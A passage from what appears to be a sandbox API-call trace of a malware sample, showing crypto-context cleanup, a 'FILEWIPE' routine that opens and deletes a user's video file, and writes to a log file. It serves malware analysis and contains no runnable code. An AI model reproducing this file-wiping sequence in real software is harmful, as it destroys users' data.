wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.510] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.510] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.510] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.510] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0198.510] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.510] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.510] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.511] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.511] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.511] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.511] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.511] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.512] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0x90af58 [0198.512] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.512] CharLowerBuffW (in: lpsz="byte[73342]", cchLength=0xb | out: lpsz="byte[73342]") returned 0xb [0198.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.513] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.513] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.513] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.513] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.513] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.514] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.514] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.514] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.515] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.515] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\tv3avy6ign_a.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0198.515] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.516] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.516] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.516] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.516] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.516] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.516] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.516] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.516] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.516] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.517] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.517] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.517] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.517] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.517] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.517] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFilePart=0x0) returned 0x3d [0198.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0x1b365b60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0x90af58 [0198.517] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\tv3avy6ign_a.swf")) returned 1 [0198.519] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0x1b365b60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0 [0198.519] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.521] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.521] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.521] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.522] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.522] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.522] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.522] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.523] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.523] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3c7a, lpOverlapped=0x0) returned 1 [0198.523] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.523] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3c7a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.523] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: 